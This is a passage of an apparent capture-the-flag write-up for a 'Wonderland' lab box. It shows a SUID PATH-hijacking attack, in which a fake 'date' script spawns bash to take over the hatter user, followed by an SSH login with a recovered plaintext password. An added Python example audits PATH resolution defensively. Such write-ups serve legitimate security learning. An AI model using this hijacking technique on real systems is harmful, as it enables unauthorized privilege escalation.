Path Hijacking
A SUID binary was suspected to be vulnerable because it calls another binary, date, without its absolute path, which leaves it open to a PATH hijacking attack: the SUID program resolves "date" through the caller's $PATH, so whichever directory is listed first wins.
rabbit@wonderland:/home/rabbit$ export PATH=/home/rabbit:$PATH
rabbit@wonderland:/home/rabbit$ echo $PATH
/home/rabbit:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
Prepending the home directory of the rabbit user to the $PATH variable
rabbit@wonderland:/home/rabbit$ cat date
#!/usr/bin/env bash
/bin/bash
Creating a "fake" date binary in the rabbit user's home directory (the shell script simply spawns /bin/bash)
rabbit@wonderland:/home/rabbit$ ./teaParty
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by hatter@wonderland:/home/rabbit$
hatter@wonderland:/home/rabbit$
hatter@wonderland:/home/rabbit$ whoami
hatter
hatter@wonderland:/home/rabbit$ hostname
wonderland
hatter@wonderland:/home/rabbit$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc fq_codel state UP group default qlen 1000
link/ether 02:a9:f1:ea:f3:b7 brd ff:ff:ff:ff:ff:ff
inet 10.10.35.235/16 brd 10.10.255.255 scope global dynamic eth0
valid_lft 1752sec preferred_lft 1752sec
inet6 fe80::a9:f1ff:feea:f3b7/64 scope link
valid_lft forever preferred_lft forever
Lateral movement to the hatter user via the PATH hijacking attack: the SUID binary ran the fake date script with hatter's effective privileges
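To make the mechanism above concrete from the defender's side, here is an added example (not part of the original writeup and not code from the target machine) that reproduces shell-style command lookup, audits a $PATH value for entries an unprivileged user can populate, and shows the environment a privileged program should install instead of trusting the caller's $PATH. The temporary directories, the fake date scripts and the SAFE_PATH value are constructed assumptions for the demonstration.

```python
"""Audit of PATH-based command resolution (added example, not from the writeup).

Assumes a POSIX filesystem and Python 3.8+. Everything under the temporary
directory created by demo() is constructed sample data.
"""
import os
import stat
import tempfile
from typing import Dict, List, Optional

# Assumed fixed search path a hardened SUID program would install itself
# (the same idea as sudo's secure_path) instead of inheriting the caller's PATH.
SAFE_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"


def parse_path(path_value: str) -> List[str]:
    """Split PATH like the shell does; an empty field means the current directory."""
    return [entry or "." for entry in path_value.split(":")]


def resolve_command(name: str, entries: List[str]) -> Optional[str]:
    """Return the first executable regular file named `name` along `entries`.

    This mirrors execvp()/the shell: the earliest matching directory wins,
    which is exactly why a directory prepended to PATH shadows /bin/date.
    """
    if "/" in name:  # an explicit path is never searched
        return name if os.path.isfile(name) and os.access(name, os.X_OK) else None
    for directory in entries:
        candidate = os.path.join(directory, name)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None


def audit_entries(entries: List[str]) -> List[str]:
    """Flag PATH entries that a non-root user could populate with a lookalike binary."""
    findings = []
    for directory in entries:
        if not os.path.isabs(directory):
            findings.append(f"{directory!r}: relative entry, resolves against the cwd")
            continue
        try:
            st = os.stat(directory)
        except FileNotFoundError:
            findings.append(f"{directory}: missing directory, lookups here are controlled by whoever creates it")
            continue
        if st.st_mode & stat.S_IWOTH:
            findings.append(f"{directory}: world-writable directory")
        elif st.st_uid != 0:
            findings.append(f"{directory}: owned by uid {st.st_uid}, not root")
    return findings


def hardened_env(caller_env: Dict[str, str]) -> Dict[str, str]:
    """Environment a privileged program should pass to child processes:
    a fixed PATH and no shell-influencing variables inherited from the caller."""
    env = {k: v for k, v in caller_env.items() if k not in ("IFS", "ENV", "BASH_ENV")}
    env["PATH"] = SAFE_PATH
    return env


def demo() -> Dict[str, object]:
    """Constructed scenario mirroring the writeup: a world-writable directory
    prepended to PATH shadows the system date. Returns what resolved where."""
    root = tempfile.mkdtemp(prefix="pathaudit-")
    user_dir = os.path.join(root, "home_rabbit")  # stands in for /home/rabbit
    sys_dir = os.path.join(root, "bin")           # stands in for /bin
    os.mkdir(user_dir)
    os.mkdir(sys_dir)
    os.chmod(user_dir, 0o777)  # constructed: world-writable so the audit flags it
    for directory in (user_dir, sys_dir):
        script = os.path.join(directory, "date")
        with open(script, "w") as fh:
            fh.write(f"#!/bin/sh\necho running from {directory}\n")
        os.chmod(script, 0o755)
    hijacked = parse_path(user_dir + ":" + sys_dir)  # what the attacker exported
    trusted = parse_path(sys_dir)                    # what a fixed PATH would give
    return {
        "user_date": os.path.join(user_dir, "date"),
        "sys_date": os.path.join(sys_dir, "date"),
        "user_dir": user_dir,
        "hijacked_resolution": resolve_command("date", hijacked),
        "trusted_resolution": resolve_command("date", trusted),
        "findings": audit_entries(hijacked),
    }


if __name__ == "__main__":
    result = demo()
    print("with attacker PATH:", result["hijacked_resolution"])
    print("with fixed PATH:   ", result["trusted_resolution"])
    for finding in result["findings"]:
        print("finding:", finding)
```

The fix for a binary like the one above is the combination shown here: invoke helpers by absolute path, set PATH to a fixed value before any exec, and strip variables such as IFS that change how a shell parses commands. The audit function is the quick check to run against a system's default PATH and against any PATH a SUID program might inherit.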
SSH
hatter@wonderland:/home/hatter$ ll
total 36
drwxr-x--- 5 hatter hatter 4096 Aug 28 15:45 ./
drwxr-xr-x 6 root root 4096 May 25 2020 ../
lrwxrwxrwx 1 root root 9 May 25 2020 .bash_history -> /dev/null
-rw-r--r-- 1 hatter hatter 220 May 25 2020 .bash_logout
-rw-r--r-- 1 hatter hatter 3771 May 25 2020 .bashrc
drwx------ 2 hatter hatter 4096 Aug 28 15:45 .cache/
drwx------ 3 hatter hatter 4096 Aug 28 15:45 .gnupg/
drwxrwxr-x 3 hatter hatter 4096 May 25 2020 .local/
-rw-r--r-- 1 hatter hatter 807 May 25 2020 .profile
-rw------- 1 hatter hatter 29 May 25 2020 password.txt
hatter@wonderland:/home/hatter$ cat password.txt
WhyIsARavenLikeAWritingDesk?
The password for the hatter user appears to be WhyIsARavenLikeAWritingDesk?
┌──(kali㉿kali)-[~/archive/thm/wonderland]
└─$ sshpass -p 'WhyIsARavenLikeAWritingDesk?' ssh hatter@$IP
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-101-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed Aug 28 15:45:20 UTC 2024
System load: 0.0 Processes: 99
Usage of /: 18.9% of 19.56GB Users logged in: 1
Memory usage: 64% IP address for eth0: 10.10.35.235
Swap usage: 0%
0 packages can be updated.
0 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
hatter@wonderland:~$ whoami
hatter
hatter@wonderland:~$ hostname
wonderland
hatter@wonderland:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc fq_codel state UP group default qlen 1000
link/ether 02:a9:f1:ea:f3:b7 brd ff:ff:ff:ff:ff:ff
inet 10.10.35.235/16 brd 10.10.255.255 scope global dynamic eth0
valid_lft 3583sec preferred_lft 3583sec
inet6 fe80::a9:f1ff:feea:f3b7/64 scope link
valid_lft forever preferred_lft forever
SSH